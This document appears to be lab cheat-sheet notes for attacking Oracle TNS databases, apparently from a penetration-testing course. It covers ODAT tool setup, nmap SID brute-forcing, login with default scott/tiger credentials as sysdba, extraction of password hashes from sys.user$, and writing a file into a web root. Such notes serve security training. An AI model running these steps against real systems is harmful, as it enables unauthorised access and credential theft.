Oracle Transparent Network Substrate
Footprinting The Service
Tool Setup
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete

Nmap
sudo nmap -p1521 -sV 10.129.204.235 --open

Nmap - SID Bruteforcing
sudo nmap -p1521 -sV 10.129.204.235 --open --script oracle-sid-brute

ODAT
./odat.py all -s 10.129.204.235

odat.py
tool to perform a variety of scans like retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations etc.SQLplus - Log In
sqlplus scott/tiger@10.129.204.235/XE

If you come across the following error sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory execute the following command
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig
Oracle RDBMS - Interaction

Oracle RDBMS - Database Enumeration
sqlplus scott/tiger@10.129.204.235/XE as sysdba

sysdba
), giving higher privileges. This is possible when the user has the appropriate privileges typically granted by the database administrator.Oracle RDBMS - Extract Password Hashes
select name, password from sys.user$;

Oracle RDBMS - File Upload
OS
Path
Linux
/var/www/html
Windows
C:\inetpub\wwwroot
echo "Oracle File Upload Test" > testing.txt
./odat.py utlfile -s 10.129.204.235 -d XE -U scott -P tiger --sysdba --putFile C:\\inetpub\\wwwroot testing.txt ./testing.txt

curl -X GET http://10.129.204.235/testing.txt

Last updated